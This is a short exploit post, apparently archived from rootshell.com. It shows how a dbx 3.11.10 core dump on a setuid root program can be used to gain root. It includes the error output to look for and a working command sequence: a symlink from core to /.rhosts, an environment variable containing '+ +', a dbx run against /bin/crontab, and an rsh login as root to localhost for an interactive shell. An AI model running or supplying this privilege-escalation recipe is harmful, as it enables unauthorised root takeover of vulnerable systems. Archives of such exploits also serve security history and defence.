[ http://www.rootshell.com/ ]

If you run dbx (tested on 3.11.10) on a setuid root program that you have
read access to, the program will core dump and create a root owned 600
perm core in the current directory. You might have to run dbx one or two
times to get it to work.. The message you are looking for is:

dbx version 3.11.10
Type 'help' for help.

warning: /bin/crontab has no symbol table -- very little is supported
without it


Could not attach to process 10112

cannot run program
Exiting due to error during startup

Now, this core dump will follow symlinks.. and using the trick mentioned
earlier with embedding + + in a core dump, you can easily grab root.

ln -s /.rhosts core
BOB42="

+ +

"
export BOB42
dbx /bin/crontab
rsh -l root localhost /bin/sh -i



jmcdonal@osprey.unf.edu